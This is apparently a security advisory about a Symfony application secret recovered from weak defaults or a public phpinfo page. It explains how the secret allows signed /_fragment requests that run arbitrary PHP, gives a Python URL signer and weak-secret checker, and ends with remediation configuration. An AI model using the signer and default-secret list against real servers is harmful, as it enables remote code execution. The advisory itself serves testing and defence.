Description
The Symfony application secret (APP_SECRET) could be recovered: it was either guessed from a list of weak or default secrets, or read from a publicly accessible phpinfo page, which lists server and environment variables, the secret included when it is supplied that way.
Symfony's fragment listener accepts requests to the fragment path (/_fragment by default, used to render ESI and hinclude sub-requests) when the URL carries a valid _hash parameter, an HMAC-SHA256 computed over the full URL with the application secret. The _path parameter of such a signed request defines the request attributes, including _controller, so anyone who knows the secret can sign a URL that invokes an arbitrary callable and thereby execute arbitrary PHP code on the server.
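The following is an added example, not code from the original advisory or from Symfony itself. It re-implements the URI signing scheme that Symfony's fragment listener verifies (the UriSigner class: query keys sorted, encoded as http_build_query does, then base64 of a raw HMAC-SHA256 over the absolute URL). A tester uses it to confirm that a candidate secret is really the one in use, either by checking it against a signed fragment URL the application emitted or by walking a short list of weak secrets. The host example.test, the controller name in the sample URL and the candidate list are constructed for the example; the default parameter name _hash and the default path /_fragment are assumed. Note that the signature covers the scheme and host as the application reconstructs them, so a URL taken from behind a reverse proxy may need its scheme or host adjusted before it validates.

```python
"""Re-implementation of the signing scheme behind Symfony's /_fragment endpoint.

Added example (not Symfony's own code). Mirrors UriSigner::sign()/check():
the query string is parsed, the _hash parameter removed, the remaining keys
sorted and re-encoded as PHP's http_build_query() does, and the HMAC-SHA256
of the resulting absolute URL is base64-encoded.
"""
import base64
import hashlib
import hmac
from urllib.parse import parse_qsl, quote, quote_plus, urlencode, urlsplit, urlunsplit

HASH_PARAM = "_hash"  # default signature parameter name in UriSigner (assumed unchanged)


def _php_urlencode(s, safe="", encoding=None, errors=None):
    # PHP urlencode() (used by http_build_query): RFC 1738, space -> '+',
    # and, unlike Python's quote_plus, '~' is percent-encoded as well.
    return quote_plus(s, safe="", encoding=encoding, errors=errors).replace("~", "%7E")


def canonical_url(uri):
    """Mirror UriSigner::buildUrl(). Returns (canonical URL without _hash, given _hash or None)."""
    parts = urlsplit(uri)
    # parse_str() semantics: percent-decoding, '+' -> space, last duplicate key wins
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    given_hash = params.pop(HASH_PARAM, None)
    query = urlencode(sorted(params.items()), quote_via=_php_urlencode)
    canonical = urlunsplit((parts.scheme, parts.netloc, parts.path, query, parts.fragment))
    return canonical, given_hash


def compute_hash(secret, canonical):
    """UriSigner::computeHash(): base64 of the raw HMAC-SHA256 digest of the URL."""
    mac = hmac.new(secret.encode(), canonical.encode(), hashlib.sha256).digest()
    return base64.b64encode(mac).decode()


def sign(secret, uri):
    """Return uri with a valid _hash appended. The base64 value is percent-encoded
    so that '+', '/' and '=' survive the server's query-string parsing."""
    canonical, _ = canonical_url(uri)
    sep = "&" if "?" in canonical else "?"
    return f"{canonical}{sep}{HASH_PARAM}={quote(compute_hash(secret, canonical), safe='')}"


def check(secret, uri):
    """UriSigner::check(): recompute over the URL minus _hash, compare in constant time."""
    canonical, given = canonical_url(uri)
    if not given:
        return False
    return hmac.compare_digest(compute_hash(secret, canonical), given)


def find_secret(candidates, signed_uri):
    """Return the first candidate that validates signed_uri, else None.

    signed_uri must be a URL the application itself signed (for instance one found
    in an ESI or hinclude tag), written with the scheme and host the application sees.
    """
    for secret in candidates:
        if check(secret, signed_uri):
            return secret
    return None


if __name__ == "__main__":
    # Constructed sample: hypothetical host and controller, Symfony Standard Edition's old default secret
    fragment = "http://example.test/_fragment?_path=_controller%3DApp%5CController%5CBlogController%3A%3Alatest"
    signed = sign("ThisTokenIsNotSoSecretChangeIt", fragment)
    print(signed)
    weak_secrets = ["secret", "changeme", "ThisTokenIsNotSoSecretChangeIt"]
    print("recovered secret:", find_secret(weak_secrets, signed))
```

Running the module signs the sample URL with the well-known default secret and then recovers that secret from the candidate list; feeding find_secret a URL the target application signed (and its real scheme and host) tells you whether the recovered secret is live without having to invoke any controller.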
Remediation
Disable ESI and the fragment listener unless sub-request rendering through /_fragment is actually needed (framework.esi and framework.fragments in the FrameworkBundle configuration), and replace the application secret (APP_SECRET) with a newly generated random value. If ESI is genuinely required, the secret must still be rotated and kept out of anything an attacker can read: remove any publicly reachable phpinfo page and never use a default or dictionary-word secret. Rotating the secret invalidates everything signed with the old one, such as remember-me cookies and previously generated signed URLs, so plan the change accordingly.
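As an added illustration (not configuration from the original advisory or from a specific application), the corresponding FrameworkBundle settings in config/packages/framework.yaml, with the weak secret setting shown commented out beside the corrected one; the environment variable is assumed to be set in .env.local to a fresh value, for example produced with php -r 'echo bin2hex(random_bytes(16)), PHP_EOL;'.

```yaml
# config/packages/framework.yaml (added example, not the page's own configuration)
framework:
    # Weak: a default, guessable or repository-committed secret.
    # secret: ThisTokenIsNotSoSecretChangeIt
    # Fixed: read a freshly generated random value from the environment (.env.local, not committed).
    secret: '%env(APP_SECRET)%'
    # Disable ESI and the fragment listener unless sub-request rendering is actually used;
    # with both off, requests to /_fragment are no longer handled by the listener.
    esi: false
    fragments: false
```

If ESI must stay enabled, keep fragments on but rotate the secret and make sure no phpinfo output or debug page exposes the environment in which APP_SECRET lives.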